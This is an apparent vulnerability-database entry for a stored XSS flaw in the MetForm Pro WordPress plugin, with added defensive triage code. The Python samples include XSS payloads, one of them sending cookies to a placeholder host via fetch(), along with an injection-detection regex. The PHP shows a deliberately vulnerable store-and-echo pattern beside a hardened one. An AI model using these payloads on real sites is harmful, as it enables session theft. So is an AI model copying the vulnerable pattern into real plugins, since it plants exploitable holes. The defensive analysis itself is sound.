
CVE-2026-1261

Severity: High
Published: 10 March 2026
Modified: 22 April 2026
KEV Added: not listed
CVSS v3.1 Score: 7.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
EPSS Score: 0.0014 (33.7th percentile)
Risk Priority: 14 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2026-1261 is a high-severity stored cross-site scripting vulnerability (CWE-79) in the MetForm Pro plugin for WordPress; NVD filed no CPE for it, so the affected product is inferred from the references. Its CVSS v3.1 base score is 7.2 (High).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). EPSS ranks it at the 33.7th percentile by exploit likelihood (below the median), and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Deeper analysis

CVE-2026-1261 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, in the MetForm Pro plugin for WordPress. It affects the Quiz feature in all versions up to and including 3.9.6 and stems from insufficient input sanitization and output escaping. Published on 2026-03-10, the vulnerability has a CVSS v3.1 base score of 7.2 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N).

Unauthenticated attackers can exploit this vulnerability remotely over the network with low attack complexity and no privileges; the vector scores no user interaction because the injection step itself needs none. By submitting malicious input through the Quiz feature, an attacker plants arbitrary web script in a page, and that script then runs in the browser of every user who later loads the page, enabling theft of session data or further compromise of the site. The changed scope (S:C) reflects that the script executes in the visitor's browser, a different component from the vulnerable plugin.

Advisories and code references point to the plugin's loader.php at lines 69, 85, and 121 in version 3.9.5. The remediation is to update MetForm Pro to a release later than 3.9.6; further details are in the Wordfence threat intelligence report and on the plugin roadmap at wpmet.com/plugin/metform/roadmaps/.
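As an added triage example (not code from the advisory, from Wordfence, or from the MetForm project): the script below reads the Version: field from a WordPress plugin header, decides whether it falls in the affected range (up to and including 3.9.6), and flags stored strings that carry script-injection markers. The plugin header and the stored rows are constructed samples; where MetForm Pro actually persists quiz submissions is not stated on this page and is an assumption of the example.

```python
"""Triage helpers for CVE-2026-1261 (stored XSS in MetForm Pro <= 3.9.6).

Added example; not code from the advisory, Wordfence, or the MetForm project.
Assumptions not stated on the page: the plugin's main file carries a standard
WordPress plugin header with a "Version:" line, and any injected quiz content
would be found among strings the plugin persists in the database.
"""
import re
from typing import List, Optional

# Highest affected release per the advisory ("up to and including 3.9.6").
LAST_VULNERABLE = "3.9.6"

# Constructed sample of a WordPress plugin header (not the real file).
SAMPLE_PLUGIN_HEADER = """<?php
/**
 * Plugin Name: MetForm Pro
 * Version: 3.9.5
 * Description: constructed sample header for this example
 */
"""

# Constructed sample rows, shaped the way a triage script might pull them
# from the database. Field names and values are placeholders.
SAMPLE_STORED_ROWS = [
    {"id": 1, "field": "quiz_answer", "value": "Paris"},
    {"id": 2, "field": "quiz_answer", "value": "<img src=x onerror=alert(document.cookie)>"},
    {"id": 3, "field": "quiz_title", "value": "Capital cities <b>quiz</b>"},
    {"id": 4, "field": "quiz_answer", "value": "<script>fetch('https://example.invalid/?c='+document.cookie)</script>"},
    {"id": 5, "field": "quiz_answer", "value": '<a href="javascript:alert(1)">click</a>'},
]

# Markers of script injection inside content that should be plain text.
# Deliberately broad: this produces a review list, not an enforcement filter.
INJECTION_MARKERS = re.compile(
    r"<\s*script\b"                         # <script ...>
    r"|\bon[a-z]+\s*=\s*"                   # inline event handlers: onerror=, onload=
    r"|javascript\s*:"                      # javascript: URLs in href/src
    r"|<\s*(?:iframe|object|embed|svg)\b",  # other script-bearing elements
    re.IGNORECASE,
)


def parse_version(version: str) -> tuple:
    """Turn '3.9.6' into (3, 9, 6). A non-numeric suffix ('3.9.6-beta') is
    dropped after its numeric prefix so pre-releases still compare."""
    parts = []
    for piece in version.strip().split("."):
        match = re.match(r"\d+", piece)
        if not match:
            break
        parts.append(int(match.group()))
    return tuple(parts)


def is_affected(version: str) -> bool:
    """True when the installed version is at or below the last vulnerable one."""
    return parse_version(version) <= parse_version(LAST_VULNERABLE)


def plugin_version_from_header(php_source: str) -> Optional[str]:
    """Extract the Version: field from a WordPress plugin header comment."""
    match = re.search(r"^\s*\*?\s*Version:\s*([^\r\n]+)", php_source,
                      re.MULTILINE | re.IGNORECASE)
    return match.group(1).strip() if match else None


def find_suspicious(rows: List[dict]) -> List[int]:
    """Return the ids of stored rows whose value carries an injection marker."""
    return [row["id"] for row in rows if INJECTION_MARKERS.search(row["value"])]


if __name__ == "__main__":
    installed = plugin_version_from_header(SAMPLE_PLUGIN_HEADER)
    print(f"installed {installed}: affected={is_affected(installed)}")
    for row_id in find_suspicious(SAMPLE_STORED_ROWS):
        print(f"review stored row {row_id}")
```

The marker list will produce false positives on ordinary text (any word starting with "on" followed by "="), which is acceptable for a review list after a vulnerability of this class but not for a filter; the defense belongs in output escaping, not in pattern matching on stored data.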


Vulnerability details

The MetForm Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Quiz feature in all versions up to, and including, 3.9.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CWE(s)

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Related Threats

MITRE ATT&CK Enterprise Techniques

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.007 JavaScript (Execution)
Adversaries may abuse various implementations of JavaScript for execution.
Why these techniques?

Stored XSS in a public-facing WordPress plugin directly enables remote exploitation of the web application (T1190) and arbitrary JavaScript execution in victims' browsers (T1059.007).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2026-3231 (shared CWE-79)
CVE-2025-23481 (shared CWE-79)
CVE-2025-69302 (shared CWE-79)
CVE-2025-23734 (shared CWE-79)
CVE-2025-23571 (shared CWE-79)
CVE-2025-65110 (shared CWE-79)
CVE-2026-24948 (shared CWE-79)
CVE-2025-27352 (shared CWE-79)
CVE-2025-30349 (shared CWE-79)
CVE-2026-3876 (shared CWE-79)

Affected Assets

WordPress (MetForm Pro plugin)
Inferred from the references and description; NVD did not file a CPE for this CVE.

Mitigating Controls (NIST 800-53 r5)

SI-10 Information Input Validation (prevent)

Directly requires validation of all inputs to the Quiz feature, blocking the unsanitized malicious payloads that enable stored XSS.

SI-15 Information Output Filtering (prevent)

Mandates output filtering/escaping on rendered pages, preventing injected scripts from executing in user browsers.

SI-3 Malicious Code Protection (prevent, detect)

Provides malicious-code detection and blocking mechanisms that can catch or neutralize the web scripts injected via the vulnerable plugin.
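The input-validation and output-filtering controls above, and the "insufficient input sanitization and output escaping" root cause from the deeper analysis, in code: an added example (not MetForm Pro's own code) showing the vulnerable pattern next to a hardened one built on WordPress's own sanitization and escaping helpers. The function names, the quiz_answer form field and the post-meta key are hypothetical; the page does not say where the plugin stores quiz data.

```php
<?php
/*
 * Added example, not code from MetForm Pro. The function names, the
 * 'quiz_answer' field and the '_example_quiz_answer' meta key are hypothetical;
 * only the WordPress helpers (sanitize_text_field, wp_unslash, esc_html,
 * esc_attr, wp_kses, wp_die, update_post_meta, get_post_meta) are real APIs.
 */

/* ---- Vulnerable pattern: raw input stored, raw output printed ----------- */

function example_quiz_save_vulnerable( int $quiz_id ) {
	// Whatever an unauthenticated submitter sends is persisted verbatim.
	$answer = $_POST['quiz_answer'] ?? '';
	update_post_meta( $quiz_id, '_example_quiz_answer', $answer );
}

function example_quiz_render_vulnerable( int $quiz_id ) {
	$answer = get_post_meta( $quiz_id, '_example_quiz_answer', true );
	// A stored payload such as <img src=x onerror=...> is emitted unchanged and
	// runs in the browser of every user who views this page.
	echo '<div class="quiz-answer">' . $answer . '</div>';
}

/* ---- Hardened pattern: validate on the way in, escape on the way out ---- */

function example_quiz_save_hardened( int $quiz_id ) {
	// Input validation (SI-10): undo WordPress's request slashing, strip tags
	// and stray percent-encoded octets, remove line breaks and control bytes,
	// then enforce the field's own constraints. Reject rather than truncate.
	$raw    = isset( $_POST['quiz_answer'] ) ? wp_unslash( $_POST['quiz_answer'] ) : '';
	$answer = sanitize_text_field( $raw );
	if ( '' === $answer || strlen( $answer ) > 500 ) {
		wp_die( 'Invalid quiz answer.', 400 );
	}
	update_post_meta( $quiz_id, '_example_quiz_answer', $answer );
}

function example_quiz_render_hardened( int $quiz_id ) {
	$answer = get_post_meta( $quiz_id, '_example_quiz_answer', true );
	// Output filtering (SI-15): escape for the exact context at the point of
	// output. This also neutralises payloads stored before the fix shipped,
	// which input validation alone never cleans retroactively.
	echo '<div class="quiz-answer" data-quiz="' . esc_attr( (string) $quiz_id ) . '">'
		. esc_html( $answer )
		. '</div>';
}

function example_quiz_render_title( string $title ) {
	// Where limited markup is a feature, allowlist it explicitly instead of
	// echoing raw HTML; wp_kses drops everything not listed, including event
	// handler attributes on the tags that are listed.
	$allowed = array(
		'b'      => array(),
		'i'      => array(),
		'em'     => array(),
		'strong' => array(),
	);
	echo '<h2 class="quiz-title">' . wp_kses( $title, $allowed ) . '</h2>';
}
```

The hardened render function closes the hole even if the hardened save is never deployed: escaping at output is the control that actually stops the script from running, which is why SI-15 sits alongside SI-10 here and why quiz data stored while a vulnerable version was installed should be treated as untrusted until reviewed.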
